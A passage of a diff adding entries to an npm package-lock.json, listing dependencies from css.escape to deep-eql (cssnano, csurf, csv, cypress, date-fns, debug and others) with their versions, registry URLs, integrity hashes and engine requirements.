"resolved": "https://registry.npmjs.org/css.escape/-/css.escape-1.5.1.tgz", + "integrity": "sha512-YUifsXXuknHlUsmlgyY0PKzgPOr7/FjCePfHNt0jxm83wHZi44VDMQ7/fGNkjY3/jV1MC+1CmZbaHzugyeRtpg==", + "dev": true + }, + "node_modules/cssdb": { + "version": "7.9.0", + "resolved": "https://registry.npmjs.org/cssdb/-/cssdb-7.9.0.tgz", + "integrity": "sha512-WPMT9seTQq6fPAa1yN4zjgZZeoTriSN2LqW9C+otjar12DQIWA4LuSfFrvFJiKp4oD0xIk1vumDLw8K9ur4NBw==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + } + ] + }, + "node_modules/cssesc": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz", + "integrity": "sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg==", + "dev": true, + "bin": { + "cssesc": "bin/cssesc" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/cssnano": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/cssnano/-/cssnano-6.0.1.tgz", + "integrity": "sha512-fVO1JdJ0LSdIGJq68eIxOqFpIJrZqXUsBt8fkrBcztCQqAjQD51OhZp7tc0ImcbwXD4k7ny84QTV90nZhmqbkg==", + "dev": true, + "dependencies": { + "cssnano-preset-default": "^6.0.1", + "lilconfig": "^2.1.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/cssnano" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/cssnano-preset-default": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/cssnano-preset-default/-/cssnano-preset-default-6.0.1.tgz", + "integrity": "sha512-7VzyFZ5zEB1+l1nToKyrRkuaJIx0zi/1npjvZfbBwbtNTzhLtlvYraK/7/uqmX2Wb2aQtd983uuGw79jAjLSuQ==", + "dev": true, + "dependencies": { + "css-declaration-sorter": "^6.3.1", + "cssnano-utils": "^4.0.0", + "postcss-calc": "^9.0.0", + "postcss-colormin": "^6.0.0", + "postcss-convert-values": "^6.0.0", + "postcss-discard-comments": "^6.0.0", + "postcss-discard-duplicates": "^6.0.0", + "postcss-discard-empty": "^6.0.0", + "postcss-discard-overridden": "^6.0.0", + "postcss-merge-longhand": "^6.0.0", + "postcss-merge-rules": "^6.0.1", + "postcss-minify-font-values": "^6.0.0", + "postcss-minify-gradients": "^6.0.0", + "postcss-minify-params": "^6.0.0", + "postcss-minify-selectors": "^6.0.0", + "postcss-normalize-charset": "^6.0.0", + "postcss-normalize-display-values": "^6.0.0", + "postcss-normalize-positions": "^6.0.0", + "postcss-normalize-repeat-style": "^6.0.0", + "postcss-normalize-string": "^6.0.0", + "postcss-normalize-timing-functions": "^6.0.0", + "postcss-normalize-unicode": "^6.0.0", + "postcss-normalize-url": "^6.0.0", + "postcss-normalize-whitespace": "^6.0.0", + "postcss-ordered-values": "^6.0.0", + "postcss-reduce-initial": "^6.0.0", + "postcss-reduce-transforms": "^6.0.0", + "postcss-svgo": "^6.0.0", + "postcss-unique-selectors": "^6.0.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/cssnano-utils": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/cssnano-utils/-/cssnano-utils-4.0.0.tgz", + "integrity": "sha512-Z39TLP+1E0KUcd7LGyF4qMfu8ZufI0rDzhdyAMsa/8UyNUU8wpS0fhdBxbQbv32r64ea00h4878gommRVg2BHw==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/csso": { + "version": "5.0.5", + "resolved": "https://registry.npmjs.org/csso/-/csso-5.0.5.tgz", + "integrity": "sha512-0LrrStPOdJj+SPCCrGhzryycLjwcgUSHBtxNA8aIDxf0GLsRh1cKYhB00Gd1lDOS4yGH69+SNn13+TWbVHETFQ==", + "dev": true, + "dependencies": { + "css-tree": "~2.2.0" + }, + "engines": { + "node": "^10 || ^12.20.0 || ^14.13.0 || >=15.0.0", + "npm": ">=7.0.0" + } + }, + "node_modules/csso/node_modules/css-tree": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/css-tree/-/css-tree-2.2.1.tgz", + "integrity": "sha512-OA0mILzGc1kCOCSJerOeqDxDQ4HOh+G8NbOJFOTgOCzpw7fCBubk0fEyxp8AgOL/jvLgYA/uV0cMbe43ElF1JA==", + "dev": true, + "dependencies": { + "mdn-data": "2.0.28", + "source-map-js": "^1.0.1" + }, + "engines": { + "node": "^10 || ^12.20.0 || ^14.13.0 || >=15.0.0", + "npm": ">=7.0.0" + } + }, + "node_modules/csso/node_modules/mdn-data": { + "version": "2.0.28", + "resolved": "https://registry.npmjs.org/mdn-data/-/mdn-data-2.0.28.tgz", + "integrity": "sha512-aylIc7Z9y4yzHYAJNuESG3hfhC+0Ibp/MAMiaOZgNv4pmEdFyfZhhhny4MNiAfWdBQ1RQ2mfDWmM1x8SvGyp8g==", + "dev": true + }, + "node_modules/cssom": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/cssom/-/cssom-0.5.0.tgz", + "integrity": "sha512-iKuQcq+NdHqlAcwUY0o/HL69XQrUaQdMjmStJ8JFmUaiiQErlhrmuigkg/CU4E2J0IyUKUrMAgl36TvN67MqTw==", + "dev": true + }, + "node_modules/cssstyle": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/cssstyle/-/cssstyle-2.3.0.tgz", + "integrity": "sha512-AZL67abkUzIuvcHqk7c09cezpGNcxUxU4Ioi/05xHk4DQeTkWmGYftIE6ctU6AEt+Gn4n1lDStOtj7FKycP71A==", + "dev": true, + "dependencies": { + "cssom": "~0.3.6" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cssstyle/node_modules/cssom": { + "version": "0.3.8", + "resolved": "https://registry.npmjs.org/cssom/-/cssom-0.3.8.tgz", + "integrity": "sha512-b0tGHbfegbhPJpxpiBPU2sCkigAqtM9O121le6bbOlgyV+NyGyCmVfJ6QW9eRjz8CpNfWEOYBIMIGRYkLwsIYg==", + "dev": true + }, + "node_modules/csstype": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/csstype/-/csstype-3.1.2.tgz", + "integrity": "sha512-I7K1Uu0MBPzaFKg4nI5Q7Vs2t+3gWWW648spaF+Rg7pI9ds18Ugn+lvg4SHczUdKlHI5LWBXyqfS8+DufyBsgQ==" + }, + "node_modules/csurf": { + "version": "1.11.0", + "resolved": "https://registry.npmjs.org/csurf/-/csurf-1.11.0.tgz", + "integrity": "sha512-UCtehyEExKTxgiu8UHdGvHj4tnpE/Qctue03Giq5gPgMQ9cg/ciod5blZQ5a4uCEenNQjxyGuzygLdKUmee/bQ==", + "dependencies": { + "cookie": "0.4.0", + "cookie-signature": "1.0.6", + "csrf": "3.1.0", + "http-errors": "~1.7.3" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/csurf/node_modules/cookie": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.0.tgz", + "integrity": "sha512-+Hp8fLp57wnUSt0tY0tHEXh4voZRDnoIrZPqlo3DPiI4y9lwg/jqx+1Om94/W6ZaPDOUbnjOt/99w66zk+l1Xg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/csurf/node_modules/cookie-signature": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "integrity": "sha1-4wOogrNCzD7oylE6eZmXNNqzriw=" + }, + "node_modules/csurf/node_modules/http-errors": { + "version": "1.7.3", + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-1.7.3.tgz", + "integrity": "sha512-ZTTX0MWrsQ2ZAhA1cejAwDLycFsd7I7nVtnkT3Ol0aqodaKW+0CTZDQ1uBv5whptCnc8e8HeRRJxRs0kmm/Qfw==", + "dependencies": { + "depd": "~1.1.2", + "inherits": "2.0.4", + "setprototypeof": "1.1.1", + "statuses": ">= 1.5.0 < 2", + "toidentifier": "1.0.0" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/csurf/node_modules/setprototypeof": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.1.1.tgz", + "integrity": "sha512-JvdAWfbXeIGaZ9cILp38HntZSFSo3mWg6xGcJJsd+d4aRMOqauag1C63dJfDw7OaMYwEbHMOxEZ1lqVRYP2OAw==" + }, + "node_modules/csurf/node_modules/toidentifier": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.0.tgz", + "integrity": "sha512-yaOH/Pk/VEhBWWTlhI+qXxDFXlejDGcQipMlyxda9nthulaxLZUNcUqFxokp0vcYnvteJln5FNQDRrxj3YcbVw==", + "engines": { + "node": ">=0.6" + } + }, + "node_modules/csv": { + "version": "5.5.3", + "resolved": "https://registry.npmjs.org/csv/-/csv-5.5.3.tgz", + "integrity": "sha512-QTaY0XjjhTQOdguARF0lGKm5/mEq9PD9/VhZZegHDIBq2tQwgNpHc3dneD4mGo2iJs+fTKv5Bp0fZ+BRuY3Z0g==", + "dependencies": { + "csv-generate": "^3.4.3", + "csv-parse": "^4.16.3", + "csv-stringify": "^5.6.5", + "stream-transform": "^2.1.3" + }, + "engines": { + "node": ">= 0.1.90" + } + }, + "node_modules/csv-generate": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/csv-generate/-/csv-generate-3.4.3.tgz", + "integrity": "sha512-w/T+rqR0vwvHqWs/1ZyMDWtHHSJaN06klRqJXBEpDJaM/+dZkso0OKh1VcuuYvK3XM53KysVNq8Ko/epCK8wOw==" + }, + "node_modules/csv-parse": { + "version": "4.16.3", + "resolved": "https://registry.npmjs.org/csv-parse/-/csv-parse-4.16.3.tgz", + "integrity": "sha512-cO1I/zmz4w2dcKHVvpCr7JVRu8/FymG5OEpmvsZYlccYolPBLoVGKUHgNoc4ZGkFeFlWGEDmMyBM+TTqRdW/wg==" + }, + "node_modules/csv-stringify": { + "version": "5.6.5", + "resolved": "https://registry.npmjs.org/csv-stringify/-/csv-stringify-5.6.5.tgz", + "integrity": "sha512-PjiQ659aQ+fUTQqSrd1XEDnOr52jh30RBurfzkscaE2tPaFsDH5wOAHJiw8XAHphRknCwMUE9KRayc4K/NbO8A==" + }, + "node_modules/cypress": { + "version": "13.13.2", + "resolved": "https://registry.npmjs.org/cypress/-/cypress-13.13.2.tgz", + "integrity": "sha512-PvJQU33933NvS1StfzEb8/mu2kMy4dABwCF+yd5Bi7Qly1HOVf+Bufrygee/tlmty/6j5lX+KIi8j9Q3JUMbhA==", + "dev": true, + "hasInstallScript": true, + "dependencies": { + "@cypress/request": "^3.0.1", + "@cypress/xvfb": "^1.2.4", + "@types/sinonjs__fake-timers": "8.1.1", + "@types/sizzle": "^2.3.2", + "arch": "^2.2.0", + "blob-util": "^2.0.2", + "bluebird": "^3.7.2", + "buffer": "^5.7.1", + "cachedir": "^2.3.0", + "chalk": "^4.1.0", + "check-more-types": "^2.24.0", + "cli-cursor": "^3.1.0", + "cli-table3": "~0.6.1", + "commander": "^6.2.1", + "common-tags": "^1.8.0", + "dayjs": "^1.10.4", + "debug": "^4.3.4", + "enquirer": "^2.3.6", + "eventemitter2": "6.4.7", + "execa": "4.1.0", + "executable": "^4.1.1", + "extract-zip": "2.0.1", + "figures": "^3.2.0", + "fs-extra": "^9.1.0", + "getos": "^3.2.1", + "is-ci": "^3.0.1", + "is-installed-globally": "~0.4.0", + "lazy-ass": "^1.6.0", + "listr2": "^3.8.3", + "lodash": "^4.17.21", + "log-symbols": "^4.0.0", + "minimist": "^1.2.8", + "ospath": "^1.2.2", + "pretty-bytes": "^5.6.0", + "process": "^0.11.10", + "proxy-from-env": "1.0.0", + "request-progress": "^3.0.0", + "semver": "^7.5.3", + "supports-color": "^8.1.1", + "tmp": "~0.2.3", + "untildify": "^4.0.0", + "yauzl": "^2.10.0" + }, + "bin": { + "cypress": "bin/cypress" + }, + "engines": { + "node": "^16.0.0 || ^18.0.0 || >=20.0.0" + } + }, + "node_modules/cypress-plugin-tab": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/cypress-plugin-tab/-/cypress-plugin-tab-1.0.5.tgz", + "integrity": "sha512-QtTJcifOVwwbeMP3hsOzQOKf3EqKsLyjtg9ZAGlYDntrCRXrsQhe4ZQGIthRMRLKpnP6/tTk6G0gJ2sZUfRliQ==", + "dev": true, + "dependencies": { + "ally.js": "^1.4.1" + } + }, + "node_modules/cypress/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/cypress/node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, + "node_modules/cypress/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/cypress/node_modules/chalk/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cypress/node_modules/commander": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-6.2.1.tgz", + "integrity": "sha512-U7VdrJFnJgo4xjrHpTzu0yrHPGImdsmD95ZlgYSEajAn2JKzDhDTPG9kBTefmObL2w/ngeZnilk+OV9CG3d7UA==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/cypress/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/cypress/node_modules/execa": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/execa/-/execa-4.1.0.tgz", + "integrity": "sha512-j5W0//W7f8UxAn8hXVnwG8tLwdiUy4FJLcSupCg6maBYZDpyBvTApK7KyuI4bKj8KOh1r2YH+6ucuYtJv1bTZA==", + "dev": true, + "dependencies": { + "cross-spawn": "^7.0.0", + "get-stream": "^5.0.0", + "human-signals": "^1.1.1", + "is-stream": "^2.0.0", + "merge-stream": "^2.0.0", + "npm-run-path": "^4.0.0", + "onetime": "^5.1.0", + "signal-exit": "^3.0.2", + "strip-final-newline": "^2.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sindresorhus/execa?sponsor=1" + } + }, + "node_modules/cypress/node_modules/fs-extra": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-9.1.0.tgz", + "integrity": "sha512-hcg3ZmepS30/7BSFqRvoo3DOMQu7IjqxO5nCDt+zM9XWjb33Wg7ziNT+Qvqbuc3+gWpzO02JubVyk2G4Zvo1OQ==", + "dev": true, + "dependencies": { + "at-least-node": "^1.0.0", + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/cypress/node_modules/is-ci": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/is-ci/-/is-ci-3.0.1.tgz", + "integrity": "sha512-ZYvCgrefwqoQ6yTyYUbQu64HsITZ3NfKX1lzaEYdkTDcfKzzCI/wthRRYKkdjHKFVgNiXKAKm65Zo1pk2as/QQ==", + "dev": true, + "dependencies": { + "ci-info": "^3.2.0" + }, + "bin": { + "is-ci": "bin.js" + } + }, + "node_modules/cypress/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/cypress/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/cypress/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/cypress/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/d": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/d/-/d-1.0.1.tgz", + "integrity": "sha512-m62ShEObQ39CfralilEQRjH6oAMtNCV1xJyEx5LpRYUVN+EviphDgUc/F3hnYbADmkiNs67Y+3ylmlG7Lnu+FA==", + "dependencies": { + "es5-ext": "^0.10.50", + "type": "^1.0.1" + } + }, + "node_modules/d/node_modules/type": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/type/-/type-1.2.0.tgz", + "integrity": "sha512-+5nt5AAniqsCnu2cEQQdpzCAh33kVx8n0VoFidKpB1dVVLAN/F+bgVOqOJqOnEnrhp222clB5p3vUlD+1QAnfg==" + }, + "node_modules/d3": { + "version": "3.5.17", + "resolved": "https://registry.npmjs.org/d3/-/d3-3.5.17.tgz", + "integrity": "sha1-vEZ0gAQ3iyGjYMn8fPUjF5B2L7g=", + "dev": true + }, + "node_modules/damerau-levenshtein": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/damerau-levenshtein/-/damerau-levenshtein-1.0.8.tgz", + "integrity": "sha512-sdQSFB7+llfUcQHUQO3+B8ERRj0Oa4w9POWMI/puGtuf7gFywGmkaLCElnudfTiKZV+NvHqL0ifzdrI8Ro7ESA==", + "dev": true + }, + "node_modules/dashdash": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", + "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", + "dependencies": { + "assert-plus": "^1.0.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/dashdash/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/dasherize": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/dasherize/-/dasherize-2.0.0.tgz", + "integrity": "sha1-bYCcnNDPe7iVLYD8hPoT1H3bEwg=" + }, + "node_modules/data-urls": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/data-urls/-/data-urls-3.0.2.tgz", + "integrity": "sha512-Jy/tj3ldjZJo63sVAvg6LHt2mHvl4V6AgRAmNDtLdm7faqtsx+aJG42rsyCo9JCoRVKwPFzKlIPx3DIibwSIaQ==", + "dev": true, + "dependencies": { + "abab": "^2.0.6", + "whatwg-mimetype": "^3.0.0", + "whatwg-url": "^11.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/data-urls/node_modules/tr46": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-3.0.0.tgz", + "integrity": "sha512-l7FvfAHlcmulp8kr+flpQZmVwtu7nfRV7NZujtN0OqES8EL4O4e0qqzL0DC5gAvx/ZC/9lk6rhcUwYvkBnBnYA==", + "dev": true, + "dependencies": { + "punycode": "^2.1.1" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/data-urls/node_modules/whatwg-url": { + "version": "11.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-11.0.0.tgz", + "integrity": "sha512-RKT8HExMpoYx4igMiVMY83lN6UeITKJlBQ+vR/8ZJ8OCdSiN3RwCq+9gH0+Xzj0+5IrM6i4j/6LuvzbZIQgEcQ==", + "dev": true, + "dependencies": { + "tr46": "^3.0.0", + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/data-view-buffer": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/data-view-buffer/-/data-view-buffer-1.0.1.tgz", + "integrity": "sha512-0lht7OugA5x3iJLOWFhWK/5ehONdprk0ISXqVFn/NFrDu+cuc8iADFrGQz5BnRK7LLU3JmkbXSxaqX+/mXYtUA==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.6", + "es-errors": "^1.3.0", + "is-data-view": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/data-view-byte-length": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/data-view-byte-length/-/data-view-byte-length-1.0.1.tgz", + "integrity": "sha512-4J7wRJD3ABAzr8wP+OcIcqq2dlUKp4DVflx++hs5h5ZKydWMI6/D/fAot+yh6g2tHh8fLFTvNOaVN357NvSrOQ==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "es-errors": "^1.3.0", + "is-data-view": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/data-view-byte-offset": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/data-view-byte-offset/-/data-view-byte-offset-1.0.0.tgz", + "integrity": "sha512-t/Ygsytq+R995EJ5PZlD4Cu56sWa8InXySaViRzw9apusqsOO2bQP+SbYzAhR0pFKoB+43lYy8rWban9JSuXnA==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.6", + "es-errors": "^1.3.0", + "is-data-view": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/date-fns": { + "version": "2.28.0", + "resolved": "https://registry.npmjs.org/date-fns/-/date-fns-2.28.0.tgz", + "integrity": "sha512-8d35hViGYx/QH0icHYCeLmsLmMUheMmTyV9Fcm6gvNwdw31yXXH+O85sOBJ+OLnLQMKZowvpKb6FgMIQjcpvQw==", + "engines": { + "node": ">=0.11" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/date-fns" + } + }, + "node_modules/dateformat": { + "version": "1.0.4-1.2.3", + "resolved": "https://registry.npmjs.org/dateformat/-/dateformat-1.0.4-1.2.3.tgz", + "integrity": "sha1-TBKxAb3buIgMI1babkVEWaXri3U=", + "engines": { + "node": "*" + } + }, + "node_modules/daterangepicker": { + "version": "2.1.27", + "resolved": "https://registry.npmjs.org/daterangepicker/-/daterangepicker-2.1.27.tgz", + "integrity": "sha512-D12idm34JQYLbhQn9oaZQGuSoLC7C4RQypx4yThqiPO+56ejrWMKN+89/KWf1RwYENwUdWOSSqzF5ZF2EkiE5g==", + "dev": true, + "dependencies": { + "jquery": ">=1.10", + "moment": "^2.9.0" + } + }, + "node_modules/dayjs": { + "version": "1.11.0", + "resolved": "https://registry.npmjs.org/dayjs/-/dayjs-1.11.0.tgz", + "integrity": "sha512-JLC809s6Y948/FuCZPm5IX8rRhQwOiyMb2TfVVQEixG7P8Lm/gt5S7yoQZmC8x1UehI9Pb7sksEt4xx14m+7Ug==", + "dev": true + }, + "node_modules/debug": { + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/debug/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/debuglog": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/debuglog/-/debuglog-1.0.1.tgz", + "integrity": "sha1-qiT/uaw9+aI1GDfPstJ5NgzXhJI=", + "engines": { + "node": "*" + } + }, + "node_modules/decamelize": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/decamelize/-/decamelize-1.2.0.tgz", + "integrity": "sha1-9lNNFRSCabIDUue+4m9QH5oZEpA=", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/decimal.js": { + "version": "10.4.3", + "resolved": "https://registry.npmjs.org/decimal.js/-/decimal.js-10.4.3.tgz", + "integrity": "sha512-VBBaLc1MgL5XpzgIP7ny5Z6Nx3UrRkIViUkPUdtl9aya5amy3De1gsUUSB1g3+3sExYNjCAsAznmukyxCb1GRA==", + "dev": true + }, + "node_modules/decode-named-character-reference": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/decode-named-character-reference/-/decode-named-character-reference-1.0.2.tgz", + "integrity": "sha512-O8x12RzrUF8xyVcY0KJowWsmaJxQbmy0/EtnNtHRpsOcT7dFk5W598coHqBVpmWo1oQQfsCqfCmkZN5DJrZVdg==", + "dev": true, + "dependencies": { + "character-entities": "^2.0.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/decode-uri-component": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/decode-uri-component/-/decode-uri-component-0.2.2.tgz", + "integrity": "sha512-FqUYQ+8o158GyGTrMFJms9qh3CqTKvAqgqsTnkLI8sKu0028orqBhxNMFkFen0zGyg6epACD32pjVk58ngIErQ==", + "dev": true, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/decompress-response": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-6.0.0.tgz", + "integrity": "sha512-aW35yZM6Bb/4oJlZncMH2LCoZtJXTRxES17vE3hoRiowU2kWHaJKFkSBDnDR+cm9J+9QhXmREyIfv0pji9ejCQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "mimic-response": "^3.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/dedent": { + "version": "0.7.0", + "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", + "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", + "dev": true, + "license": "MIT" + }, + "node_modules/deep-diff": { + "version": "0.3.8", + "resolved": "https://registry.npmjs.org/deep-diff/-/deep-diff-0.3.8.tgz", + "integrity": "sha512-yVn6RZmHiGnxRKR9sJb3iVV2XTF1Ghh2DiWRZ3dMnGc43yUdWWF/kX6lQyk3+P84iprfWKU/8zFTrlkvtFm1ug==" + }, + "node_modules/deep-eql": { + "version": "3.0.1", + "resolved": 